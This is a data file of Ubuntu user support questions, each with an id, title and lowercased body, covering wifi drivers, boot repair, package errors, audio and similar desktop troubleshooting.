333338	unable to connect to open wireless network sometimes in ubuntu 12.04	i am sharing an internet connection with my friend using a d-link dsl-2750u wireless router and my network cars is atheros ar9285 . recently i am unable to connect to the network sometimes . what could be the problem ? iwconfig gave the following output : iwconfig mon0 ieee 802.11bgn mode : monitor tx-power=15 dbm retry long limit:7 rts thr : off fragment thr : off power management : on eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11bgn essid : '' dlink '' mode : managed frequency:2.412 ghz access point : not-associated tx-power=15 dbm retry long limit:7 rts thr : off fragment thr : off power management : off ifconfig gave the following output : ifconfig eth0 link encap : ethernet hwaddr 78:84:3c : e7:0f:5a up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:2458 errors:0 dropped:0 overruns:0 frame:0 tx packets:2458 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:172791 ( 172.7 kb ) tx bytes:172791 ( 172.7 kb ) mon0 link encap : unspec hwaddr cc-af-78-b3-e5-0f-00-00-00-00-00-00-00-00-00-00 up broadcast notrailers running promisc allmulti mtu:1500 metric:1 rx packets:38404 errors:0 dropped:442 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:2671272 ( 2.6 mb ) tx bytes:0 ( 0.0 b ) wlan0 link encap : ethernet hwaddr cc : af:78 : b3 : e5:0f up broadcast multicast mtu:1500 metric:1 rx packets:89 errors:0 dropped:0 overruns:0 frame:0 tx packets:185 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:22749 ( 22.7 kb ) tx bytes:32983 ( 32.9 kb ) nm-tool gave the following output : n m-tool networkmanager tool state : connecting - device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : r8169 state : unavailable default : no hw address : 78:84:3c : e7:0f:5a capabilities : carrier detect : yes wired properties carrier : off - device : wlan0 [ dlink ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : 802.11 wifi driver : ath9k state : connecting ( configuring ) default : no hw address : cc : af:78 : b3 : e5:0f capabilities : wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points chandu : infra , ac : f1 : df : e8:31:09 , freq 2412 mhz , rate 54 mb/s , strength 32 wpa wpa2 dlink : infra , fc:75:16 : d4:60:32 , freq 2412 mhz , rate 54 mb/s , strength 15
333341	'unattended upgrades ' does not reboot system	i have set up 'unattended upgrades ' on a 12.04 lts machine . it 's working quite fine with the exception of that it does n't reboot even though all config files have been set to enable this . config files under /etc/apt/apt.conf.d : 50unattended-upgrades http : //pastebin.com/850nqexv10periodic http : //pastebin.com/t0xh9ppx /var/run/reboot-required exists and has the contents `` \*\*\* system restart required \*\*\* '' actually now that i 'm thinking of it unattended upgrades is having some problems sending email to the recipient due to network/mail issues . this is the only ( albeit remote ) source of trouble i can think of .
333343	git cloning error	i 've just started to learn git and i tried to run this command : git clone git : //github.com/schacon/ticgit.git it did not work and i got this error message gwapps @ gwapps-thinkpad-x61 : /home/gitrepo $ sudo git clone git : //github.com/schacon/ticgit.git cloning into 'ticgit ' ... fatal : unable to connect to github.com : github.com [ 0 : 204.232.175.90 ] : errno=connection refused is there anyone who can help me the solve this problem ? thanks in advance ! edit output of netstat -tulpn active internet connections ( only servers ) proto recv-q send-q local address foreign address state pid/program name tcp 0 0 127.0.1.1:53 0.0.0.0 : * listen - udp 0 0 0.0.0.0:68 0.0.0.0 : * - udp 0 0 10.20.2.160:123 0.0.0.0 : * - udp 0 0 127.0.0.1:123 0.0.0.0 : * - udp 0 0 0.0.0.0:123 0.0.0.0 : * - udp 0 0 0.0.0.0:44048 0.0.0.0 : * - udp 0 0 127.0.1.1:53 0.0.0.0 : * - udp6 0 0 fe80 : :216 : d3ff : fec4:123 : : : * - udp6 0 0 : :1:123 : : : * - udp6 0 0 : ::123 : : : * - udp6 0 0 : ::58657 : : : * -
333347	is there a gui for nethogs ?	or anything similar to nethogs . i have this terminal window opened with nethogs running to see what application is using the bandwidth but it would be so much nicer in the bar next to the clock or even in a gui . does anything like that exists for ubuntu ? a bit like little snitch on the mac .
333349	c++ graphic on geany + xlib + badalloc = destroyed friday	i have been trying to run a c++ program using geany , and now , after ages of coding , i want to test the program . this is what comes up : xlib : extension `` nv-glx '' missing on display `` :0 '' . x error of failed request : badalloc ( insufficient resources for operation ) major opcode of failed request : 154 ( glx ) minor opcode of failed request : 24 ( x_glxcreatenewcontext ) serial number of failed request : 29 current serial number in output stream : 30 i am feeling hopeless right now after 4 hours of searching google . can someone help me please ?
333350	no drivers for amd radeon hd 8750m or amd radeon hd 8550	i have a pretty urgent problem . i bought asus n56dy laptop , and all of the specs are available here . the only difference is that i replaced the original hdd with an ssd . the graphic cards in question are : ati radeon hd 8750m ( discrete graphics card ) and amd radeon hd 8550 igp ( integrated ) . my problem is that i ca n't find any support or drivers for the above items for ubuntu . i use mostly ubuntu for work , and because of this , the system acts slower . has anybody had success in installing this type of graphic card , or has any idea when and if there will be any support for them ? is there any advice that you can give me on how to solve this problem ?
333351	i downloaded ubuntu . it appeared as a removable disk drive . then i restarted my computer . the ubuntu files were missing . how do i get them back ?	after i downloaded ubuntu 12.10 on to my laptop running windows 8 , it appeared as a removable disk drive ( dvd drive ) . i then clicked on the wubi application , but it did not respond , so i restarted my computer . after i restarted and opened my computer the ubuntu files are missing . i could n't search for them either . my laptop- sony svf5212 . is ubuntu still there ? how can i install now ?
333353	12.04 , login screen loop	actually my touchpad was not working , so i installed and uninstalled some packages and i did not know what they were . now i am now getting a login screen and after typing password , it is coming back to the login screen again and again . help me to solve this problem .
333354	dual-boot system stopped booting to both so	i have a dual-boot system with ubuntu 12.10 ( or 04 , ca n't remember right now ) and windows 8 working perfectly for almost 6 months . but yesterday the laptop was in windows 8 and i put it to sleep/hibernate ( by closing the lid ) and hours later i 've opened it . strangely , a couple error messages showed up but honestly i ignored them because at that time i thought they were not important . anyway , windows was asking to be restarted in order to complete the installing updates . so i did . then the computer booted in grub rescue : error : file `/boot/grub/x86-64-efi/normal.modâ not found grub rescue > ls ( hd0 ) ( hd0 , gpt9 ) ( hd0 , gpt8 ) ( hd0 , gpt7 ) ( hd0 , gpt6 ) ( hd0 , gpt5 ) ( hd0 , gpt4 ) ( hd0 , gpt3 ) ( hd0 , gpt2 ) ( hd0 , gpt1 ) ( hd1 ) ( hd1 , gpt1 ) ( cd0 ) then i used a livecd to try to recover the grub . first of all , i 've generated a boot-info summary : http : //paste.ubuntu.com/5992517/ . then i 've tried to do the recommended boot-repair : gpt detected . please create a bios-boot partition ( > 1mb , unformatted filesystem , bios_grub flag ) . this can be performed via tools such as gparted . then try again . alternatively , you can retry after activating the [ separate /boot/efi partition : ] option . i do n't know how to make such partition , then i 've tried first to activate the reffered option ( in sda1 ) . the boot-repair has been completed with the following boot-info summary : http : //paste.ubuntu.com/5992562/ . but now when i restart the machine : [ ... ] pxe-e61 : media test failure , check cable pxe-e61 : exiting pxe rom . no boot device found . press any key to reboot the machine how can i fix this ?
333356	ca n't uncompress jdk7 zip file	i 'm trying to download and install java development kit 7 onto my ubuntu machine . i 've downloaded the file from oracle ( jdk-7u25-linux-x64.tar.gz ) but when i try to uncompress the file using tar -xvf jdk-7u25-linux-x64.tar.gz i get the following error : tar : jdk-7u25-linux-x64.tar.gz : can not open : no such file or directory tar : error is not recoverable : exiting now is there something i 'm doing wrong ? if not how do i fix ?
333357	muted headphone jack , but if i replug in headphones i need to go into alsamixer and unmute it again	when i plug my headphones into my laptop ( hp dv6 6176sa ) , i can get no sound through them , while the laptop 's speakers work perfectly . i managed to fix this by opening alsamixer and seeing that when i plug in my headphones the 'speakers ' become muted , i unmuted them and increased the volume , my headphones worked . however i then unplugged them , and plugged them back in , and once again speakers became muted and 0 volume . why does this occur and how can i fix it so that i do n't have to go into alsamixer every time i want to use headphones ?
333370	ubuntu uefi install	i have read and to some extent understood the issues surrounding uefi and ubuntu . however , i am not able to install ubuntu 13.04 64-bit in uefi mode next to an existing windows 8 uefi install . in short what i do is : i burned the ubuntu iso to a dvd as well as a usb stick . then i keep uefi boot activated , and secure boot deactivated . the uefi ubuntu menu comes up as it should , i can choose between `` try ubuntu '' , `` install ubuntu '' etc . however , no matter which option i choose try or install , the screen goes blank and nothing more happens . the same happens if i turn on secure boot and if i use the dvd or the usb stick . if i switch off uefi and go to legacy mode , everything works fine and i did install ubuntu that way . however , now if i want to use windows 8 i have to go to bios every time and switch back to uefi mode . any suggestions ?
333375	dell xps 13 developer edition wifi problem	i have a dell xps 13 developer edition ( l322x ) with the atheros killer wifi card installed . it 's a lovely laptop , but the wifi was hanging for 30 seconds or so , or dropping and reconnecting frequently .
333376	will i be able to download me epub reader and use it offline to read my ebooks ?	my acer c7 is intended to by my travel computer . i want to be able to read my ebooks offline with it . if i am in the middle of the ocean on a cruise , or elsewhere out offline , will crouton allow me to do this ? will the kindle reader work with crouton ? if not , what reader is recommended ?
333391	online accounts - what is its purpose 13.04 ?	ok so i have put in my facebook etc into online accounts , but i do n't understand what the integration is concerning my email and notifications , i see the empathy messaging service which is cool i guess but surely i am missing someone , could someone link me somewhere/explain about the uses of online accounts and how they should be used
333393	black screen after suspending ubuntu 13.04	somewhat of a newbe , but know removing my hp-g62 battery fixes it each time . my problem is similar to others , but i have not seen a clear solution , at least not lately . any ideas i can try ?
333395	ubuntu 12.04 does n't find my wireless adapter on vmware	i have installed ubuntu 12.04 on vmware on my laptop ( hp envy 17 ) but it does n't find my wireless adapter .
333396	i am unable to install wifi wireless driver bcm4311 on hp compaq nc8430 - ubuntu 12.04	tony @ tony-lap : ~ $ lspci -vvnn | grep 14e4 08:00.0 ethernet controller [ 0200 ] : broadcom corporation netxtreme bcm5753m gigabit ethernet pci express [ 14e4:16fd ] ( rev 21 ) 10:00.0 network controller [ 0280 ] : broadcom corporation bcm4311 802.11b/g wlan [ 14e4:4311 ] ( rev 01 ) here is what i did to install bcm4311 //remove the old driver sudo apt-get remove bcmwl-kernel-source //to install b43 driver sudo apt-get install b43-fwcutter firmware-b43-installer sudo gedit /etc/modules add `` b43 '' without quotes at the end of the textfile , note you can only use one module per line . sudo gedit /etc/modprobe.d/blacklist.conf add `` blacklist wl '' without quotes to keep the wrong module from being loaded on boot . sudo reboot click on system setting → click on “additional drivers” → select broadcom std driver – > click on activate i am getting an error after clicking activate on additional drivers , please help ! ! ! ! ! ! ! ! here is the output . tony @ tony-lap : ~ $ rfkill list all 0 : phy0 : wireless lan soft blocked : no hard blocked : yes 1 : hp-wifi : wireless lan soft blocked : no hard blocked : yes tony @ tony-lap : ~ $ dmesg|grep b43 [ 19.802871 ] b43-phy0 : broadcom 4311 wlan found ( core revision 10 ) [ 20.947260 ] registered led device : b43-phy0 : :tx [ 20.947291 ] registered led device : b43-phy0 : :rx [ 20.947320 ] registered led device : b43-phy0 : :radio [ 21.124062 ] b43-phy0 : loading firmware version 508.1084 ( 2009-01-14 01:32:01 ) [ 21.204649 ] b43-phy0 : radio hardware status changed to disabled [ 21.212038 ] b43-phy0 : radio turned on by software [ 21.212042 ] b43-phy0 : the hardware rf-kill button still turns the radio physically off . press the button to turn it on . tony @ tony-lap : ~ $ iwconfig wlan0 ieee 802.11bg essid : off/any mode : managed access point : not-associated tx-power=off retry long limit:7 rts thr : off fragment thr : off power management : off lo no wireless extensions . eth0 no wireless extensions .
333398	openvpn connection timeout	i am trying to establish a vpn connection using openvpn . i think have set up the vpn server correctly . i followed this instructions . from the server i have received the files ca.crt , ca.key , client1.crt , client1.csr , client1.key and raspberripi.ovpn what have i done so far ? i have installed openvpn and network-manager-openvpn . wnt to the network icon at the to right corner > vpn > configure vpn > create > import from existing configurations there i picked the raspberrypi.ovpn-file . all settings seemed correct so i saved the connection . but it fails to connect . it gives me the message `` connection could not be established because the network-connection caused a timeout '' i am sorry if the labels are not exactly as on your version of ubuntu . mine is in german and i translated them : p here is the content from the raspberrypi.ovpn file : dev tun client proto udp remote le-morri.selfhost.bz 1194 resolv-retry infinite nobind persist-key persist-tun ca ca.crt cert client1.crt key client1.key comp-lzo verb 3 my ubuntu version is : 13.04 i hope you can help me establish the connection .
333405	ca n't install from ubuntu software center in 13.04	i am a new user to ubuntu , presently using ubuntu 13.04 32-bit . i ca n't install any software from the ubuntu software center . i am getting errors such as : failed to download repository information .
333408	merging folders in ubuntu one	i have two folders in ubuntu one that came from two diferent notebooks , and one of them crashed . is there a way to merge those folders using the web interface , so all files will be in the folder of the remaining notebook ? thanks in advance .
333409	how to install the monaco font ?	monaco is the default font in the iterm terminal for mac os x . how can i install it on ubuntu ?
333411	updating or uninstalling and reinstalling firefox on linux	i am trying to upgrade firefox on linux , and it is not working . i thought about uninstalling it and reinstalling it , but i do n't have a clue about how to do that . can anyone help me ?
333414	sublime text 2 command ctrl+shift+/ is override in ubuntu	i use sublime text 2 and because i use to work in different computer i do n't like to change the default setting , so i note that ctrl+shift+/ is overridden in ubuntu but i do n't know where to verify this . ctrl+shift+/ is for block comments and is very handy , have any of you fixed this ? update , i just notice something that is even wrong . my laptop has num keyboard , that includes in it the / but sublime do nothing when i use ctrl+/ ( in the num pad ) , but works with the / in my 7 , i mean , ctrl+shift+7 i 'm totally lost now
333415	python startup icon	using ubuntu 13.04 . i have never coded or know how to . i can only click on a icon and hope it run . now i want to learn python 3 . i extracted -- python 3.3.2 xzipped source tarball ( for linux , unix or mac os x , better compression ) -- to a file i made in home/programs and now have home/programs/python-3.3.2 . i cant find any icon to start this program or must i use a terminal . is it possible to install a icon or what must i type in the terminal .
333417	ubuntu 13.04 format my ntfs partition	i install ubuntu 13.04 , choosing the option `` replace win7 '' . when my computer reboots , i see that my other data pratition is missing . my win7 partition was 100gb , and the other 220gb was the data . i have a lot of importatnt data , how can i get them back ? i do n't use my computer since the fresh install . i do n't want to lose all of my data in the hard drive . please help me . thx for yuour replies .
333418	removal of ecryptfs	install of linux mint recommends drive encryption and uses ecryptfs . unfortunately , they do n't want you of the trouble you are getting into . ecryptfs seems near impossible to remove cleanly . there are `` explanations '' that are totally unclear on essential steps . the evidence of this is that there continue to be questions on how to remove it . you can see just what a mess it is by checking out this forum post on linux mint forums , http : //forums.linuxmint.com/viewtopic.php ? f=90 & t=142219 & p=754007 # p754007 .
333420	in ubuntu , how to find whether cmos battery is working or not ?	i want to programatically determine whether cmos battery is working or not . in my c++ program on linux i want to connect to internet and update system time if cmos battery is not present or not working .
333421	brightness control problem on acer aspire v5	i am running ubuntu 12.04 lts on new acer aspire v5 . there is no other os installed . i can not control the brightness of the screen using fn+left and fn+right keys . i tried to change brightness from `` brightness and lock '' settings , bit still it does not work . brightness control bar moves , but brightness does not actually change . other people have modified the file /etc/default/grub for other acer models . but that solution does not work for me . any advise will be of much help . thank you .
333422	chromium and empathy do n't like eachother	basically what happens is that i logged into my google account with the online accounts thing in ubuntu 13.04 , and so if i first open chromium and then open empathy , empathy will give me an error saying it could n't log into gtalk , but if i open empathy first and then open chromium , chromium will give an error saying that someone else tried to log in with my account and log me out of the browser , logging back into chromium does n't help as i get thrown out immediately does any of you brilliant minds know what i can do to relieve this problem ? i use empathy to talk to my friends on google talk and i use chromium as my primary browser so i 'm in a really unideal situation here .
333424	how can i check the information of currently installed wifi drivers ?	when i clicked on additional drivers on ubuntu 12.04 , i could not see any drivers.. how can i check what drivers are installed for wifi on ubuntu environment .
333428	how to clear up herringbone video problem ?	i have ubuntu 13.04 . when i turn the computer on , most of the time i get a herringbone pattern . if i turn it off and back on . sometimes that works . then i get the opening screen with the programs . sometimes if i go to e-mail , i get a herringbone pattern . i then have to restart the pc again . i am a novice to ubuntu , so be kind .
333438	can i have ubuntu forget about unmet dependency errors ?	i was trying to install adobe reader and it did n't finish installing . then i decided that i dont need adobe reader and how do i have ubuntu think everything is fine and there are no unmet dependencies or have ubuntu get those dependencies ? i need to resolve this error because my system is running out of memory because of apps and i cant install or uninstall packages . i have tried sudo apt-get install -f and i get this : [ sudo ] password for harley : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : acroread-bin suggested packages : libldap2 libgnome-speech7 the following new packages will be installed : acroread-bin 0 upgraded , 1 newly installed , 0 to remove and 213 not upgraded . 1 not fully installed or removed . need to get 60.1 mb of archives . after this operation , 142 mb of additional disk space will be used . do you want to continue [ y/n ] ? y get:1 http : //archive.canonical.com/ubuntu/ raring/partner acroread-bin i386 9.5.5-1raring1 [ 60.1 mb ] fetched 60.1 mb in 35s ( 1,676 kb/s ) ( reading database ... 158479 files and directories currently installed . ) unpacking acroread-bin ( from ... /acroread-bin_9.5.5-1raring1_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/acroread-bin_9.5.5-1raring1_i386.deb ( -- unpack ) : trying to overwrite '/usr/lib/firefox/plugins ' , which is also in package adobe-flashplugin 11.2.202.297-0raring1 no apport report written because maxreports is reached already dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf-2.index ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... processing triggers for man-db ... errors were encountered while processing : /var/cache/apt/archives/acroread-bin_9.5.5-1raring1_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) harley @ harley-pc : ~ $ i tried sudo apt-get remove acroread-bin and i get this [ sudo ] password for harley : reading package lists ... done building dependency tree reading state information ... done package 'acroread-bin ' is not installed , so not removed you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : acroread : depends : acroread-bin but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . i tried all of the soloutions from how do i resolve unmet dependencies ? that i could ( all of the ones that use terminal only )
333442	how do i mount my main internal ext4 drive on a fresh install of xubuntu 12.04 ? ( acer c7 320gb hdd )	first of all i am a brand-newbie to linux/ubuntu . second , i have searched on my own for a way to do this for 4 hours and just ca n't quite find it or find it explained the right way . i apologize if this is a duplicate or a difficulty 1/100 for any basic linux/ubuntu user . that being said , here is my setup : i am running xubuntu 12.04 alongside chromeos via `` crouton '' on an acer c7 chromebook . it 's a fresh install from yesterday ( the xubuntu that is ) . i 've managed to figure out the launcher , and the apt-get and ppa repository and that stuff ... for the most part . i got a few basic programs - firefox , skype , vlc , audacious , and qbittorrent . so now i 'm ready to download some videos and music and i arrived at my problem . the problem is i am ( very ) quickly running out of space ( 660 mb remaining ) . thing is it 's a 320 gb hdd and i have a 311 gb drive sitting greyed out on my desktop . when i try right-clicking and mounting , i get this : click for large size . so i went in sudo fdisk -l and it promptly told me that /dev/sda was a gpt and fdisk could not format it , and i needed to get gnu parted . so i tried simply `` sudo apt-get install parted '' and sure enough it grabbed gnu parted 2.3 . here is what ( parted ) print returned for me : click for large size . so my question is how can i get this 311 gb of space working for me as storage ? to be clear it 's just a partition on my internal 320 gb hdd that came with my acer c7 chromebook . do i need to mount it somehow or could i somehow change one of the other existing partitions to just be bigger ? again i apologize for my level of noviceness and any help is much appreciated !
333443	where are the nautilus arrows and the status bar ?	in older versions of nautilus there were arrows to unfold a folder and see the contents without having to enter the folder ( see image ) . there was also a status bar , that showed the available free space of the device . where have all these things gone and how can i get them back ?
333446	what does `` run command as a login shell '' do ?	i have a few separate programs installed , some of which require me to go into my gui terminal settings and enable/disable the `` run command as a login shell '' option to get either working . example : i installed ruby on rails . unfortunately i have to go into the terminal options and enable `` run command as login shell '' for it to be in my path . this was n't too much of an issue up until i installed sexy-bash-prompt , which works only if the option is disabled . so my question is essentially : what does `` run command as login shell '' do ? is there a way to get the things that run when it 's disabled to run when you do run as login shell ?
333452	[ ubuntu ] turtle beach x12 headset mic not working ?	i did a lot of research , i had not luck . i can hear audio in my headset , but the mic is not detected . here is my set up : ubuntu 12.04 ( 64-bit/x64 ) lts intel celeron processor ( dual-core ) realtek soundcard ( unknown model , came with the laptop i am using ) 8 gb ram dual-booted with windows 7 home premium ( 64-bit/x64 ) my head set is : turtle beach earforce x12 here is how my headset is set up : mic-in : mic jack audio-out : headset jack usb : for power i am not using any driver , because turtle beach does not require a driver . i have the mic working on windows 7 , so it is definitely not my pc , it is the os . i am not sure how to fix it , since in my search , the questions on sites were not answered/not my situation . i have specified all the details that i know about the system that other posts that were abandoned/not answered/locked . i have been working to make my mic work for hours with no success , and my other headset ( a logitech ) works just fine , but my mic is using the input on my laptop , so it should be detected but is n't . anyone have a solution/work-around/diagnostic advice ? i would really appreciate it . ~djmann1013
333453	problem : installation ubuntu 12.04 as a virtual machine	i want to install ubuntu 12.04 as a virtual machine with virtual box ( version 4.2.16 ) on my macbook pro . however , at the end of the installation , i am told to remove installation media and tray and then press enter . as i do not use installation media but only an iso file ( provided by ubuntu website ) , i just pressed `` enter '' but nothing happened . my guess is that pressing any keys does n't have any effects in my case ( i can not see any character when pressing on character keys ) . so i shutdown the machine and relaunched it . then , the os told me he can not detect my graphic card ( or devices ) and my only possibility is to use ubuntu 12.04 in a terminal . do you have any hints on this situation ? thank you in advance . joachim
333456	password protected .odt file	i had saved a .odt file with a password , subsequently i uninstalled ubuntu and got windows 7 , though i remember the password am not able to open the odt file . please help as it contains very important data .
333461	is ubuntu suitable for an embedded system ?	i am a beginner . i 've heard a lot about ubuntu , so i want to know if it 's the perfect os for me . i will be using it to learn embedded linux and programming microcontrollers in c. can i go with ubuntu ? please give me your suggestions .
333463	why ubuntu do not run video games ? or some programs i used to run on windows 7	i can not run video games i used to play in windows 7 , also there are a lot of programs that worked on windows 7 but do n't work on ubuntu
333464	how can one combine a series of grep statements piped together ?	i would like to know if there is a way to combine a series of grep statements into one that works like this ./script i want output like this a b c not like this a c a b a b c a b c d hear is a look at the script . # ! /bin/bash string= '' a b c d a b a b c a b c d '' echo -e `` \ti want output like this '' echo `` $ string '' | grep a |grep c |grep -v d echo -e `` \n\tnot like this '' echo `` $ string '' | grep -e'a ' -e'c ' -e-v'd'
333467	how to turn off keyboard backlight of and alienware m14x laptop	ok , i have an alienware m14x and the keyboard backlight is always on and i ca n't turn it off ... google did n't me much . i want to turn it off because it 's disturbing sometimes i uninstalled windows os from my laptop so i ca n't really disable it from there
333469	ca n't hear anything through the speakers	i was going to have a skype call but i was unable to hear anything . everything was working fine until now . moreover , when i checked..i could not hear any songs , videos or any videos from youtube . did some search and executed these commands : sudo gpasswd -a akshay audio after this , i executed - killall pulseaudio but still i can not hear anything . any ideas ? pulseaudio -- check did n't work , displayed nothing . here are the results for pulseaudio -- dump-conf : akshay @ akshay-inspiron-5521 : ~ $ pulseaudio -- dump-conf # # # read from configuration file : /etc/pulse/daemon.conf # # # daemonize = no fail = yes high-priority = yes nice-level = -11 realtime-scheduling = yes realtime-priority = 5 allow-module-loading = yes allow-exit = yes use-pid-file = yes system-instance = no local-server-type = user cpu-limit = no enable-shm = yes flat-volumes = no lock-memory = no exit-idle-time = 20 scache-idle-time = 20 dl-search-path = /usr/lib/pulse-3.0/modules default-script-file = /etc/pulse/default.pa load-default-script-file = yes log-target = auto log-level = notice resample-method = speex-float-1 enable-remixing = yes enable-lfe-remixing = no default-sample-format = s16le default-sample-rate = 44100 alternate-sample-rate = 48000 default-sample-channels = 2 default-channel-map = front-left , front-right default-fragments = 8 default-fragment-size-msec = 10 enable-deferred-volume = yes deferred-volume-safety-margin-usec = 1 deferred-volume-extra-delay-usec = 0 shm-size-bytes = 0 log-meta = no log-time = no log-backtrace = 0 rlimit-fsize = -1 rlimit-data = -1 rlimit-stack = -1 rlimit-core = -1 rlimit-rss = -1 rlimit-as = -1 rlimit-nproc = -1 rlimit-nofile = 256 rlimit-memlock = -1 rlimit-locks = -1 rlimit-sigpending = -1 rlimit-msgqueue = -1 rlimit-nice = 31 rlimit-rtprio = 9 rlimit-rttime = 1000000
333474	what music player works with ipod nano 7th generation ?	does anyone know of a music player that supports the ipod nano 7g ? i know amarok does n't , and i have n't had any success playing around with rhythm box or banshee . any suggestions for how to get these or other players to work would be wonderful !
333475	preventing pip from removing system packages during upgrade	i have a fairly straightforward ubuntu ( 13.04 ) desktop installation , which comes complete with several ubuntu-packaged python utilities -- these live in /usr/lib/python2.7 and are owned by root . i call these `` system '' python packages . i also do a lot of scientific work with python and so i have installed tools like numpy , matplotlib , etc . using pip -- these live in /usr/local/lib/python2.7 and are owned by me ( i chowned /usr/local because i 'm the only user on this machine ) . i call these `` local '' python packages . i put the local path in front of the system one in my pythonpath so that i load local packages preferentially . now , i 'm trying to upgrade one of the local packages that i installed using pip , and pip is failing because it wants to uninstall a dependent system package as part of the upgrade process . i have two questions about this , addressing the problem from each end : one way to fix this problem is to get pip to upgrade my local packages and ignore the system-installed ones ( if possible ) . can i prevent pip from trying to uninstall a system package during a local package upgrade , but only for one dependency ? another way would be to have pip install a newer version of the package , and then use that version to satisfy dependencies in apt related tools . is there a way to tell ubuntu that a pip-installed package will satisfy an apt dependency ? ( i am familiar with virtualenv , but on this machine i only ever use this one environment , so i 'd really like to avoid keeping track of whether i 'm working in the correct virtualenv . )
333476	/var/www owner for apache2 and ftp access	i 've got apache2 running on ubuntu server 12.04 lts on an old laptop . it 's on my local network to act as a webserver to help me learn php ( and linux ) . the default owner for the /var/www folder ( where the webpages for apache are stored ) is www-data . with the owner set to www-data i ca n't copy files/folders to that folder over ftp . if i change the owner of the /var/www folder to james ( my ftp user ) then i can move files over ftp but apache does n't have access to display any pages or sub folders . what should the correct owner be to allow access for ftp user james and apache ?
333480	`` no module named 'pycurl ' `` exception when adding apt repo in terminal	i just installed ubuntu 13.04 a few hours ago . after installing some softwares , i surprisingly find i just ca n't add apt repo in terminal any more ! when i excute sudo add-apt-repository ppa : tiheum/equinox , the terminal just throws me these debug message : traceback ( most recent call last ) : file `` /usr/lib/python3/dist-packages/softwareproperties/ppa.py '' , line 98 , in get_ppa_info_from_lp lp_page = urllib.request.urlopen ( request , cafile=launchpad_ppa_cert ) file `` /usr/lib/python3.3/urllib/request.py '' , line 148 , in urlopen context.load_verify_locations ( cafile , capath ) filenotfounderror : [ errno 2 ] no such file or directory during handling of the above exception , another exception occurred : traceback ( most recent call last ) : file `` /usr/bin/add-apt-repository '' , line 129 , in < module > ppa_info = get_ppa_info_from_lp ( user , ppa_name ) file `` /usr/lib/python3/dist-packages/softwareproperties/ppa.py '' , line 105 , in get_ppa_info_from_lp import pycurl importerror : no module named 'pycurl' i find it reported as a bug here , but that bug thread did n't mention any solution . can anyone help me ? thanks so much ! after sudo apt-get install python3-pycurl , when i sudo add-apt-repository ppa : tiheum/equinox again , i got this strange message : can not access ppa ( https : //launchpad.net/api/1.0/~tiheum/+archive/equinox ) to get ppa information , please check your internet connection . but actually my internet connection is working fine ( e.g . i can sudo apt-get update ) . what 's on earth with my add-apt-repository ?
333483	how to restore grub after deleting it from windows 8 disk manager ?	i deleted 2 partitions from windows 8 disk manager . it turned out one of them is the grub partition . now the laptop directly goes to grub rescue mode . i used f12 to select the system i want to boot into , but all ended up in grub rescue . the ubuntu installation cd does not help either . does anyone have any idea to resolve this problem ?
333490	permission denied using dd to clone main drive	so i 'm trying to clone the setup of one computer to 4 identical machines on the same network . i do n't fancy the idea of meddling with the insides of the computer , so i 'm following the method outlined here however , whenever i try the method outlined in the accepted answer , i get dd : opening 'dev/sda1 ' : permission denied since the drive i 'm cloning is my main partition , i 'm running both machines off of live cds . i thought it might not be working because i ca n't clone the drive when it 's mounted , but running umount /dev/sda1 / says it 's not mounted . i 'm not 100 % set on using this particular method , if there 's some other way that would also get the job done .
333492	how to configure mutt to work with pop and horde webmail service ?	i have installed mutt from repositories and somehow configured from scratch .muttrc configuration file for gmail and its working hassle free . but , i would like to use mutt for my office mail . we usually use horde webmail service and would like to use pop also . but i do n't know the configuration for it - the folder path and all .
333498	sensors-detect did n't detect cpu sensor	i 'm trying to get my sensors to work as per the how to , but nothing shows . the 500 lines of my results of running sensors-detect and lshw and so forth are here : http : //paste.ubuntu.com/5993742/ i 'm on ubuntu 12.04 lts and have lm-sensors installed : thufir @ dur : ~ $ thufir @ dur : ~ $ sudo apt-get install lm-sensors reading package lists ... done building dependency tree reading state information ... done lm-sensors is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . thufir @ dur : ~ $
333507	overwrite existing data with zeroes ?	okay so i 'm trying to format my hdd to ntfs on ubuntu 13.04 and it gives me two options , do n't overwrite existing data ( quick ) , and overwrite existing data with zeroes ( slow ) . what does it mean to overwrite the existing data with zeroes ? i plan on installing windows 7 but it says my hdd must be in ntfs format . please help me with this.thanks in advance .
